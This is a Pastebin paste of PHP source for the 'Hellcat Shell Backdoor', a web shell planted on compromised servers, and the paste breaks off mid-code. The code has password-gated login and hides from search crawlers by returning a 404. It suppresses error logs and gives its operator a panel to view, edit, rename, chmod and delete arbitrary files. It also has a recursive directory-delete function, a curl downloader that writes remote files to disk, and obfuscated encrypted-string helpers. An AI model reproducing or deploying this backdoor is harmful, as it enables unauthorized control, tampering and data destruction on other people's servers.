Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- //-- Coded by Bartes Dwiky --//
- //-- Premium Script Hellcat Shell Backdoor --//
- //-- http://hellcatindonesia.net --//
- //------------------[ readme ] ------------------//
- // In accordance with the provisions and services ... we hope you enjoy this script, we have not made this script fully for paid members, for updates you will make a notification later ... Thanks! //
- error_reporting(0);
- ob_start("ob_gzhandler");
- //-- FITUR RUBAH PASSWORD ADA DI DALAM SHELL --//
- //$pass = "9c4a382e85f9492ce86d8fa71ee5c581"; // lol
- $pass = "63a9f0ea7bb98050796b649e85481845"; // root
- $_POST = cl($_POST);
- $_GET = cl($_GET);
- $_COOKIE = cl($_COOKIE);
- $_COEG = array_merge($_POST, $_GET);
- $_COEG = array_map("xp", $_COEG);
- $cookie = md5($_SERVER['HTTP_USER_AGENT']);
- if(!isset($_COOKIE['HELLCAT'])) {
- vb('HELLCAT', $cookie);
- }
- function vb($k, $v) {
- $_COOKIE[$k] = $v;
- setcookie($k, $v);
- }
- function mtr($y) {
- vars('<meta http-equiv="refresh" content="1;url='.$y.'"/>');
- return $y;
- }
- function op($d, $e) {
- $fp = fopen($d, "w");
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $e);
- curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_SSL_VERIFYhellcatR, false);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
- curl_setopt($ch, CURLOPT_FILE, $fp);
- return curl_exec($ch);
- curl_close($ch);
- fclose($fp);
- ob_flush();
- flush();
- }
- function deledir($dirname) {
- if (is_dir($dirname))
- $dir_handle = opendir($dirname);
- if (!$dir_handle)
- return false;
- while($file = readdir($dir_handle)) {
- if ($file != "." && $file != "..") {
- if (!is_dir($dirname."/".$file))
- unlink($dirname."/".$file);
- else
- deledir($dirname.'/'.$file);
- }
- }
- closedir($dir_handle);
- rmdir($dirname);
- return true;
- }
- function a($x17) {
- @define("x13", "\x31\x33\x33\x37", true);
- $x14 = base64_decode($x17);
- $x16s = substr($x14, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
- $x19 = rtrim(
- mcrypt_decrypt(
- MCRYPT_RIJNDAEL_128,
- hash('sha256', x13, true),
- substr($x14, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)), MCRYPT_MODE_CBC, $x16s), "\0");
- return $x19;
- }
- function x($b) {
- $c = a($b);
- return $c;
- }
- function vars($x) {
- echo $x;
- }
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('html_errors',0);
- @ini_set('max_execution_time',0);
- @ini_set('file_uploads',1);
- @set_time_limit(0);
- @clearstatcache();
- @define("x4", "https://www.hellcatindonesia.net", true);
- @define("x5", "\x64\x69\x72\x3d", true);
- @define("x7", "\x63\x6f\x6d\x6d\x61\x6e\x64\x3d", true);
- @define("x6", "\x66\x69\x6c\x65\x3d", true);
- @define("sec", $pass, true);
- if(isset($_COEG['dir'])) {
- $dir = str_replace("\\", "/", $_COEG['dir']);
- @chdir($dir);
- } else {
- $dir = str_replace("\\", "/", getcwd());
- }
- $dir = str_replace("\\","/", $dir);
- $scdir = explode("/", $dir);
- function cl($arr){
- $quotes_sybase = strtolower(ini_get('magic_quotes_sybase'));
- if(function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()){
- if(is_array($arr)){
- foreach($arr as $k=>$v){
- if(is_array($v)) $arr[$k] = cl($v);
- else $arr[$k] = (empty($quotes_sybase) || $quotes_sybase === 'off')? stripslashes($v) : stripslashes(str_replace("\'\'", "\'", $v));
- }
- }
- }
- return $arr;
- }
- function xp($str){
- return (is_array($str))? array_map("rawurldecode", $str):rawurldecode($str);
- }
- function r($r) {
- vars('<script>window.location = "'.$r.'";</script>');
- return $r;
- }
- function s($s) {
- echo 'notif({
- type: "default",
- msg: "<span class=\'alert\'><font color=\'#fff\'>'.$s.'</font>",
- width: "all",
- height: 100,
- position: "center",
- });';
- return $s;
- }
- function error($text) {
- echo '<script> notif({
- type: "default",
- msg: "<span class=\'alert\'><font color=\'#fff\'>'.$text.'</font>",
- width: "all",
- height: 100,
- position: "center",
- });</script>';
- return $text;
- }
- function success($text) {
- echo '<script> notif({
- type: "default",
- msg: "<span class=\'alert\'><font color=\'#fff\'>'.$text.'</font>",
- width: "all",
- height: 100,
- position: "center",
- });</script>';
- return $text;
- }
- if(get_magic_quotes_gpc()) {
- function stripslashes_array($array) {
- return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
- }
- $_COEG = stripslashes_array($_COEG);
- $_COOKIE = stripslashes_array($_COOKIE);
- }
- if(!empty(sec)) {
- if(isset($_COEG['pass']) && (md5($_COEG['pass']) == sec)) vb('HELLCAT', sec);
- if(!isset($_COOKIE['HELLCAT']) || ($_COOKIE['HELLCAT'] != sec))
- login();
- }
- function login() {
- if(!empty($_SERVER['HTTP_USER_AGENT'])) {
- $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
- if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
- header('HTTP/1.0 404 Not Found');
- exit;
- }
- }
- //eval(str_rot13(gzinflate(str_rot13(base64_decode("RikuqywqKVdKsEgAseKBzPiCpMT0osT0NA2l0vT0cSt9/TLd3KTEIr2CJL2yUf3SosrKgrxn/cqkkrJR3TQQN9NVLz07XVbTmpersKxVUFYFdyhDBAA=")))));
- ?>
- <!DOCTYPE html><html><head>
- <title>HellCat Indonesia - <?php echo $_SERVER["REMOTE_ADDR"]; ?>
- <?php
- die('</title> <meta name="robots" content="noindex, nofollow, noarchive"> <meta name="viewport" content="width=device-width, initial-scale=1">
- <meta property="og:type" content="article">
- <meta name="description" content="version 1.0.">
- <link rel="icon" type="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTJVGle-arAu0pdnTeY--royJcpsVLhzyEj_RYJGnRkolUzkNrg7DzyamtiVn1LMBtnG9o5Xw&usqp=CAE&s">
- <meta property="og:title" content="Hellcat Indonesia Shell Backdoor!">
- <meta property="og:description" content="version 1.0."/>
- <meta property="og:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTJVGle-arAu0pdnTeY--royJcpsVLhzyEj_RYJGnRkolUzkNrg7DzyamtiVn1LMBtnG9o5Xw&usqp=CAE&s">
- <meta property="og:image:type" content="image/jpeg"/>
- <meta property="og:image:width" content="300" />
- <meta property="og:image:height" content="300" />
- <meta property="fb:app_id" content="1784293148453056" />
- <link href="http://aashirwadtravel.com/favicon.ico" rel="icon" type="image/x-icon"/>
- <meta name="theme-color" content="#222"><meta name="apple-mobile-web-app-capable" content="yes">
- <meta name="apple-mobile-web-app-status-bar-style" content="#222"><meta name="msapplication-navbutton-color" content="#222"><meta name="author" content="Hellcat Indonesia">
- <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"/>
- <style>
- @import url("https://fonts.googleapis.com/css?family=Cabin");
- *{
- box-sizing: border-box;
- }
- *:focus {
- outline: 0;
- }
- body {
- font-size: 14px;
- color:#fff;
- margin:auto;
- font-family: "Cabin";
- background:#191919;
- text-shadow:0px 0px 0px #343436;
- }
- .btn-exe {
- background:#343436;
- color:#fff;
- font-family: "Cabin";
- padding:6px;
- border:1px solid #343436;
- width:100%;
- font-size:13px;
- }
- .login-container {
- max-width: 450px;
- margin: auto;
- overflow: auto;
- background:none;
- }
- .login-kepala {
- background:#262624;
- padding:10px;
- color:#fff;
- font-size:17px;
- position:fixed;z-index:1024;top:0;left:0;right:0;
- box-shadow:0px 0px 3px #111;
- font-family: "Cabin";
- }
- input[type=password] {
- border:1px solid #343436;
- padding:8px;
- background: #1D1D1D;
- color:#fff;
- font-family: "Cabin";
- width:100%;
- font-size:14px;
- }
- .btn-exe:hover {
- background:none;
- border:1px solid #343436;
- -webkit-transition: all 0.3s;
- -moz-transition: all 0.3s;
- transition: all 0.3s;
- }
- table {
- width: 100%;
- }
- @media screen and (max-width: 1024px) {
- .btn-exe {
- background:#343436;
- color:#fff;
- font-family: "Cabin";
- padding:7px;
- border:1px solid #343436;
- width:100%;
- font-size:13px;
- }
- }
- @media screen and (max-width: 780px) {
- .btn-exe {
- background:#343436;
- color:#fff;
- font-family: "Cabin";
- padding:7px;
- border:1px solid #343436;
- width:100%;
- font-size:14px;
- }
- }
- .posisi{
- position: relative;
- top: 100px;
- }
- </style>
- </head>
- <body><div class="login-kepala">
- <div class="login-container"><form action="" method="post"><table><td align="center" style="width:10%"><i class="fa fa-terminal"></i></td><td style="width:70%"><input type="password" name="pass" placeholder="Please enter your password" style="padding:7px"> </td><td style="text-align:right;width:20%"><button onmousedown="bleep.play();" type="submit" class="btn-exe"><i class="fa fa-sign-in"></i></button></td></table></form></div></div>
- </div>
- </body></html>
- ');
- }
- ?>
- <!DOCTYPE HTML>
- <html lang="id">
- <head><title>HellCat Indonesia - <?php echo $_SERVER["REMOTE_ADDR"]; ?></title>
- <script>
- var bleep = new Audio();
- bleep.src = 'https://s.cdpn.io/217233/buttonHoverScary.wav';
- </script>
- <?php
- vars('
- <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
- <meta property="og:type" content="article">
- <meta name="description" content="version 1.3">
- <link rel="icon" type="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTJVGle-arAu0pdnTeY--royJcpsVLhzyEj_RYJGnRkolUzkNrg7DzyamtiVn1LMBtnG9o5Xw&usqp=CAE&s">
- <meta property="og:title" content="Hellcat Indonesia Shell Backdoor!">
- <meta property="og:description" content="version 1.0."/>
- <meta property="og:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTJVGle-arAu0pdnTeY--royJcpsVLhzyEj_RYJGnRkolUzkNrg7DzyamtiVn1LMBtnG9o5Xw&usqp=CAE&s">
- <meta property="og:image:type" content="image/jpeg"/>
- <meta property="og:image:width" content="300" />
- <meta property="og:image:height" content="300" />
- <meta property="fb:app_id" content="1784293148453056" />
- <link href="http://aashirwadtravel.com/favicon.ico" rel="icon" type="image/x-icon"/>
- <meta name="theme-color" content="#222">
- <meta name="apple-mobile-web-app-capable" content="yes">
- <meta name="apple-mobile-web-app-status-bar-style" content="#222">
- <meta name="msapplication-navbutton-color" content="#222">
- <meta name="author" content="HellCat Indonesia">
- <style>
- @import url("https://fonts.googleapis.com/css?family=Cabin");
- *{
- box-sizing: border-box;
- }
- *:focus {
- outline: 0;
- }
- body {
- font-size: 14px;
- color:#fff;
- margin:auto;
- font-family: "Cabin";
- background:#191919;
- text-shadow:0px 0px 0px #343436;
- }
- ::selection {
- background-color: rgba(201,223,255,0.2);
- color: #ffffff;
- }
- ::-moz-selection {
- background-color: rgba(201,223,255,0.1);
- color: #ffffff;
- }
- hr {
- border: 0;
- height: 1px;
- background-image: -webkit-linear-gradient(left, #343436, #343436, #343436);
- background-image: -moz-linear-gradient(left, #343436, #343436, #343436);
- background-image: -ms-linear-gradient(left, #343436, #343436, #343436);
- background-image: -o-linear-gradient(left, #343436, #343436, #343436);
- }
- code {
- font-family: "Cabin";
- word-wrap: break-word;
- background:none;
- }
- pre {
- margin:0px;
- border:1px solid #343436;
- white-space: pre-wrap;
- white-space: -moz-pre-wrap;
- white-space: -pre-wrap;
- white-space: -o-pre-wrap;
- word-wrap: break-word;
- }
- .co {
- margin:auto;
- max-width:300px;
- }
- .a:hover {
- color:#1D9D73;
- -webkit-transition: all 0.3s;
- -moz-transition: all 0.3s;
- transition: all 0.3s;
- }
- .mainc {
- color: #1D9D73;
- }
- .coL-option {
- padding:5px;
- border:1px solid #343436;
- margin-top:5px;
- background:none;
- }
- .coL-btn-option-active {
- padding:5px;
- background: #343436;
- border:1px solid #343436;
- font-size:16px;
- font-family: "Cabin";
- width:100%;
- color:#fff;
- }
- .coL-btn-option {
- padding:5px;
- background: none;
- border:1px solid #343436;
- font-size:16px;
- font-family: "Cabin";
- width:100%;
- color:#fff;
- }
- .coL-btn-option:hover {
- background: #343436;
- width:100%;
- -webkit-transition: all 0.3s;
- -moz-transition: all 0.3s;
- transition: all 0.3s;
- }
- .coL-option-panel {
- padding:5px;
- border:none;
- background:#343436;
- }
- th {
- font-weight: normal;
- font-size: 15px;
- }
- .btn-exe {
- background:#343436;
- color:#fff;
- font-family: "Cabin";
- padding:6px;
- border:1px solid #343436;
- width:100%;
- font-size:13px;
- }
- textarea {
- border: 1px solid #343436;
- width: 100%;
- height: 487px;
- padding: 5px;
- background: #1D1D1D;
- color: #ffffff;
- font-family: "Cabin";
- font-size: 13px;
- }
- select {
- cursor:pointer;
- padding:6px;
- border:1px solid #343436;
- font-family: "Cabin";
- font-size:14px;
- background: #1D1D1D;
- width:100%;
- color: #fff;
- -webkit-transition: all 0.5s;
- -moz-transition: all 0.5s;
- transition: all 0.5s;
- }
- .php {
- font-size: 13px;
- }
- .td-md5 {
- border-right:1px solid #1D9D73;
- padding:6px;
- }
- .login-container {
- max-width: 450px;
- margin: auto;
- overflow: hidden;
- background:none;
- }
- .login-kepala {
- background:#262624;
- padding:10px;
- color:#fff;
- font-size:17px;
- position:fixed;z-index:1024;top:0;left:0;right:0;
- box-shadow:0px 0px 3px #111;
- font-family: "Cabin";
- }
- .dir {
- background:#1D1D1D;
- padding:2px;
- margin-left:2px;
- margin-right:2px;
- margin-top:3px;
- margin-bottom:1px;
- }
- .dir-pallet {
- background:#343436;
- padding:6px;
- text-align:left;
- }
- .dir-td-left {
- width:50px;
- border-right:1px solid #1D9D73;
- font-size: 14px;
- }
- .dir-td-right {
- padding-left:5px;
- font-size: 15px;
- }
- .tools-content {
- padding:3px;
- margin-top:5px;
- background:none;
- border:1px solid #343436;
- }
- .td-tools-left {
- padding:7px;
- width:30px;
- text-align:center;
- }
- .td-tools-icon {
- width:50px;
- background:none;
- text-align:center;
- }
- .td-tools-content {
- padding-left:5px;
- }
- .ex-hov:hover {
- background:rgba(52, 52, 54, 0.3);
- -webkit-transition: all 0.3s;
- -moz-transition: all 0.3s;
- transition: all 0.3s;
- }
- .kepala {
- background:#343436;
- padding:7px;
- color:#fff;
- font-size:15px;
- position:fixed;z-index:1024;top:0;left:0;right:0;
- box-shadow:0px 0px 3px #111;
- font-family: "Cabin";
- }
- .co-ontainer {
- max-width: 820px;
- margin: auto;
- overflow: hidden;
- background:none;
- }
- .co-ontainer-2 {
- max-width: 820px;
- margin: auto;
- overflow: hidden;
- background:#232326;
- margin-top:50px;
- }
- table {
- width:100%;
- }
- .td-panel {
- background: #343436;
- padding:5px;
- width:40px;
- text-align:center;
- }
- .td-panel-right {
- padding-left:3px;
- font-size: 14px;
- }
- .wrap {
- word-wrap: break-word;
- }
- .break {
- word-break: break-all;
- white-space: normal;
- }
- .btn-dark:hover {
- color:#4B81AA;
- }
- .coL-panel {
- padding:1px;
- border:1px solid #343436;
- color:#fff;
- background:none;
- }
- .coR-panel {
- padding:1px;
- border:1px solid #343436;
- color:#fff;
- background:none;
- }
- .footer {
- background:#343436;
- color:#fff;
- padding:8px;
- text-align:center;
- margin-top:2px;
- }
- .btn-nav {
- background:rgba(0,0,0,0.3);
- padding:6px;
- color:#fff;
- font-size:14px;
- font-family: "Cabin";
- width:100%;
- border:none;
- font-weight:normal;
- }
- .btn-nav:hover {
- background:#343436;
- -webkit-transition: all 0.3s;
- -moz-transition: all 0.3s;
- transition: all 0.3s;
- }
- .table-info {
- margin-top:3px;
- border-collapse:collapse;
- font-family: "Cabin";
- }
- .th-info {
- padding:6px;
- border:1px solid #343436;
- background:#343436;
- border-collapse:collapse;
- font-family: "Cabin";
- }
- .td-info {
- padding:7px;
- border:1px solid #343436;
- background:none;
- border-collapse:collapse;
- font-family: "Cabin";
- }
- .table-file {
- margin-top:3px;
- border-collapse:collapse;
- font-family: "Cabin";
- }
- .th-file {
- padding:6px;
- border:1px solid #343436;
- background:#343436;
- border-collapse:collapse;
- font-family: "Cabin";
- }
- .td-file {
- padding:4px;
- border:1px solid #343436;
- background:none;
- border-collapse:collapse;
- font-family: "Cabin";
- }
- .label-danger {
- color:#FF0000;
- }
- .label-default {
- color:#1D9D73;
- }
- .label-success {
- color:#1D9D73;
- }
- .top {
- margin-top:5px;
- }
- input[type=text] {
- border:1px solid #343436;
- padding:7px;
- background: #1D1D1D;
- color:#fff;
- font-family: "Cabin";
- width:100%;
- font-size:14px;
- }
- input[type=password] {
- border:1px solid #343436;
- padding:8px;
- background: #1D1D1D;
- color:#fff;
- font-family: "Cabin";
- width:100%;
- font-size:14px;
- }
- input[type=file] {
- border:1px solid #343436;
- color:trasparent;
- background: #1D1D1D;
- width:100%;
- font-size:12px;
- padding:4px;
- font-family: "Cabin";
- }
- .alert {
- font-family: "Cabin";
- }
- .btn-exe:hover {
- background:none;
- border:1px solid #343436;
- -webkit-transition: all 0.3s;
- -moz-transition: all 0.3s;
- transition: all 0.3s;
- }
- .nav {
- background: #303030;
- color:#fff;
- width:30px;
- height:30px;
- padding:5px;
- border:none;
- border-radius:100%;
- box-shadow: 2px 2px 2px rgba(0,0,0,0.3) inset;
- }
- .nav:hover {
- background: #1D9D73;
- transition: all 0.5s ease-in-out;
- color: #fff;
- }
- /* Main */
- background-size:100% 125%;
- padding-top:250px;
- padding-bottom:5px;
- padding-left:5px;
- padding-right:5px;
- border:0px solid #1D1D1D;
- }
- .coL {
- width: 469px;
- border: 0px solid #343436;
- background: #1D1D1D;
- padding: 5px;
- float: left;
- margin-left:2px;
- margin-right:2px;
- margin-bottom:2px;
- margin-top:3px;
- color:white;
- }
- .coR {
- width: 343px;
- border: 0px solid #343436;
- background: #1D1D1D;
- margin-left:2px;
- margin-right:2px;
- margin-bottom:2px;
- margin-top:3px;
- padding: 5px;
- float: left;
- }
- a {
- text-decoration:none;
- color:#fff;
- }
- .cookie-td {
- width: 150px;
- }
- @media screen and (max-width: 1024px) {
- .co-ontainer-2 {
- width: 100%;
- }
- .coL {
- width: 467px;
- background: none:
- border: none;
- margin-bottom:3px;
- }
- .coR {
- width: 42%;
- float: right;
- }
- .cookie-td {
- width: 150px;
- }
- .btn-exe {
- background:#343436;
- color:#fff;
- font-family: "Cabin";
- padding:7px;
- border:1px solid #343436;
- width:100%;
- font-size:13px;
- }
- input[type=file] {
- border:1px solid #343436;
- color:trasparent;
- background: #1D1D1D;
- width:100%;
- font-size:12px;
- padding:4px;
- font-family: "Cabin";
- }
- }
- @media screen and (max-width: 780px) {
- background-size:100% 100%;
- padding-top:160px;
- padding-bottom:5px;
- padding-left:5px;
- padding-right:5px;
- margin:3px;
- }
- .coL {
- width: auto;
- float: none;
- }
- .coR {
- width: auto;
- float: none;
- }
- .cookie-td {
- width: 100px;
- }
- .btn-exe {
- background:#343436;
- color:#fff;
- font-family: "Cabin";
- padding:7px;
- border:1px solid #343436;
- width:100%;
- font-size:14px;
- }
- input[type=file] {
- border:1px solid #343436;
- color:trasparent;
- background: #1D1D1D;
- width:100%;
- font-size:12px;
- padding:6px;
- font-family: "Cabin";
- }
- }
- .hljs{display:block;overflow-x:auto;padding:0.5em;background:#1D1D1D;color:#e6e1dc}
- .hljs-comment,.hljs-quote{color:#bc9458;font-style:italic}
- .hljs-keyword,.hljs-selector-tag{color:#c26230}
- .hljs-string,.hljs-number,.hljs-regexp,.hljs-variable,.hljs-template-variable{color:#a5c261}
- .hljs-subst{color:#519f50}.hljs-tag,.hljs-name{color:#e8bf6a}
- .hljs-type{color:#da4939}
- .hljs-symbol,.hljs-bullet,.hljs-built_in,.hljs-builtin-name,.hljs-attr,.hljs-link{color:#6d9cbe}
- .hljs-params{color:#d0d0ff}
- .hljs-attribute{color:#cda869}
- .hljs-meta{color:#9b859d}
- .hljs-title,.hljs-section{color:#ffc66d}
- .hljs-addition{background-color:#144212;color:#e6e1dc;display:inline-block;width:100%}
- .hljs-deletion{background-color:#600;color:#e6e1dc;display:inline-block;width:100%}
- .hljs-selector-class{color:#9b703f}
- .hljs-selector-id{color:#8b98ab}
- .hljs-emphasis{font-style:italic}
- .hljs-strong{font-weight:bold}
- .hljs-link{text-decoration:underline}
- #ui_notifIt{
- position: fixed;
- top: 10px;
- right: 10px;
- left:10px;
- cursor: pointer;
- overflow: hidden;
- -webkit-box-shadow: 0px 3px 5px rgba(0, 0, 0, 0.3);
- -moz-box-shadow: 0px 3px 5px rgba(0, 0, 0, 0.3);
- -o-box-shadow: 0px 3px 5px rgba(0, 0, 0, 0.3);
- box-shadow: 0px 3px 5px rgba(0, 0, 0, 0.3);
- -wekbit-border-radius: 5px;
- -moz-border-radius: 5px;
- -o-border-radius: 5px;
- border-radius: 5px;
- z-index: 2000;
- }
- #ui_notifIt:hover{
- opacity: 1 !important;
- }
- #ui_notifIt p{
- text-align: center;
- font-family: sans-serif;
- font-size: 14px;
- padding: 0;
- margin: 0;
- }
- #notifIt_close{
- position: absolute;
- color: #FFF;
- top: 0;
- padding: 0px 5px;
- right: 0;
- }
- #notifIt_close:hover {
- background-color: rgba(255, 255, 255, 0.3);
- }
- #ui_notifIt.default{
- background: #242424;
- border:0px solid #091835;
- box-shadow:0px 2px 4px rgba(0,0,0,0.4);
- }
- /* notifit confirm */
- .notifit_confirm_bg,
- .notifit_prompt_bg{
- position: fixed;
- top: 0;
- left: 0;
- height: 100%;
- width: 100%;
- background-color: rgba(255, 255, 255, 0.1);
- }
- .notifit_confirm *,
- .notifit_prompt *{
- font-family: sans-serif;
- }
- .notifit_confirm,
- .notifit_prompt{
- position: fixed;
- top: 0;
- left: 0;
- padding: 30px 30px 0px 30px;
- background-color: #eee;
- border: 1px solid rgba(0, 0, 0, 0.1);
- -webkit-border-radius: 5px;
- -moz-border-radius: 5px;
- -ms-border-radius: 5px;
- -o-border-radius: 5px;
- border-radius: 5px;
- -webkit-box-shadow: 0px 2px 10px rgba(0, 0, 0, 0.2);
- box-shadow: 0px 2px 10px rgba(0, 0, 0, 0.2);
- }
- option {
- -webkit-transition: all 0.5s;
- -moz-transition: all 0.5s;
- transition: all 0.5s;
- }
- .move-top {
- position: fixed;
- bottom: 10px;
- right: 10px;
- text-decoration: none;
- padding: 10px;
- display: none;
- cursor:pointer;
- background:rgba(0, 0, 0, 0.2);
- border-radius:5px;
- } </style>
- <link rel="icon" href="/image/favicon.ico" type="image/x-icon" />
- <script>
- baseUrl = window.location.href.split("?")[0];
- window.history.pushState("name", "?", baseUrl);
- function c(x) {
- window.location = x
- }
- </script>
- <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"/>
- <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.js"></script>
- <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/highlight.min.js"></script>
- <script src="'.x4.'alert.js"></script>
- <style>
- .move-top {
- position: fixed;
- bottom: 10px;
- right: 10px;
- text-decoration: none;
- padding: 10px;
- display: none;
- cursor:pointer;
- background:rgba(0, 0, 0, 0.2);
- border-radius:5px;
- }</style>
- <i class="fa fa-chevron-up move-top"></i>
- <script>
- jQuery(document).ready(function() {
- var offset = 220;
- var duration = 500;
- jQuery(window).scroll(function() {
- if (jQuery(this).scrollTop() > offset) {
- jQuery(\'.move-top\').fadeIn(duration);
- } else {
- jQuery(\'.move-top\').fadeOut(duration);
- }
- });
- jQuery(\'.move-top\').click(function(event) {
- event.preventDefault();
- jQuery(\'html, body\').animate({scrollTop: 0}, duration);
- return false;
- })
- });
- </script>
- <script>hljs.initHighlightingOnLoad();</script></head><div class="kepala"><div class="co-ontainer">
- <table><td style="width:25px">
- <b><i class="fa fa-superpowers"></i></b></td><td>HELLCAT INDONESIA</td><td style="text-align:right;width:100px">
- <button onmousedown="bleep.play();" class="nav" onclick=\'c("'.$_SERVER['PHP_SELF'].'")\'><i class="fa fa-home"></i></button>
- <button onmousedown="bleep.play();" class="nav" onclick=\'c("?'.x5.getcwd().'&'.x7.'about")\'><i class="fa fa-question"></i></button>
- <button onmousedown="bleep.play();" class="nav" onclick=\'c("?'.x5.getcwd().'&'.x7.'logout")\'><i class="fa fa-power-off"></i></button></td></table></div></div>
- <div class="co-ontainer-2">
- <div class="cover"></div>
- <div class="dir">
- <table style="width:100%">
- <td style="width:100%"><div class="dir-pallet"><table><td class="dir-td-left"><i class="fa fa-bandcamp"></i><td class="dir-td-right break">');
- foreach($scdir as $c_dir => $cdir) {
- echo "<a class='a' onclick=\"c('?dir=";
- for($i = 0; $i <= $c_dir; $i++) {
- echo $scdir[$i];
- if($i != $c_dir) {
- echo "/";
- }
- }
- echo "')\">$cdir</a>/";
- }
- vars('</td></table></div></th></table></div>');
- $filez = basename($_COEG['file']);
- $size = filesize("$dir/$filez")/1024;
- $size = round($size,3);
- if($size > 1024) {
- $size = round($size/1024,2). ' MB';
- } else {
- $size = $size. ' KB';
- }
- vars('<div class="coL">');
- if($_COEG['command'] == 'logout') {
- r($_SERVER['PHP_SELF']);
- setcookie('HELLCAT', time() - 3600);
- }
- // --- View Source --- //
- elseif($_COEG['command'] == 'view') {
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">SOURCE VIEWER</td></table></div>';
- echo '<div class="coL-option">';
- echo '<table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="1D9D73">[</font> '.basename($_COEG['file']).' <font color="1D9D73">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
- <hr>';
- echo "<table><th><button class='coL-btn-option-active'><i class='fa fa-eye'></i></button></th>
- <th><a onclick=\"c('?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
- <th><a onclick=\"c('?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
- <th><a onclick=\"c('?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
- <th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
- $source = htmlspecialchars(@file_get_contents($_COEG['file']));
- if(empty($source)) {
- error('Source Not Found !!');
- echo x9;
- } else {
- echo "<pre class='top'><code class='php'>".$source."</code></pre>";
- }
- }
- elseif($_COEG['command'] == 'edit') {
- if($_COEG['save']) {
- $save = file_put_contents($_COEG['file'], $_COEG['src']);
- if($save) {
- success('Source Saved !!');
- } else {
- error('Permission Denied !!');
- }
- }
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">EDIT FILE</td></table></div>';
- echo '<div class="coL-option">
- <table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="1D9D73">[</font> '.basename($_COEG['file']).' <font color="1D9D73">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
- <hr><table>';
- echo "<th><a onclick=\"c('?".x7."view&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
- <th><button class='coL-btn-option-active'><i class='fa fa-pencil'></i></button></th>
- <th><a onclick=\"c('?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
- <th><a onclick=\"c('?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
- <th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
- $source = htmlspecialchars(@file_get_contents($_COEG['file']));
- if(empty($source)) {
- echo "<form method='post' action='?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px'>
- <textarea name='src' placeholder='# Put your code here...' class='top'></textarea><br>
- <input onmousedown='bleep.play();'
- type='submit' class='btn-exe' value='Save' name='save' style='margin-top:3px;width: 100%'></form>";
- } else { echo "<form method='post' action='?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px'>
- <textarea name='src' class='top'>".$source."</textarea>
- <input onmousedown='bleep.play();'
- type='submit' value='Save' name='save' class='btn-exe' style='margin-top:3px;width: 100%'></form>";
- }
- }
- elseif($_COEG['command'] == 'rename') {
- if($_COEG['rename']) {
- $rename = rename($_COEG['file'], "$dir/".htmlspecialchars($_COEG['rename'])."");
- if($rename) {
- success('File Renamed !!');
- mtr("?".x7."rename&".x5.$dir."&".x6.$dir."/".$_COEG["rename"]);
- } else {
- error('Permission Denied !!');
- }
- }
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">RENAME FILE</td></table></div>';
- echo '<div class="coL-option"><table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="1D9D73">[</font> '.basename($_COEG['file']).' <font color="1D9D73">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
- <hr><table>';
- echo "<th><a onclick=\"c('?".x7."view&".x5.$dir."&".x6.$_COEG['file']."')\"><button onmousedown='bleep.play();'
- class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
- <th><a onclick=\"c('?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."')\"><button onmousedown='bleep.play();'
- class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
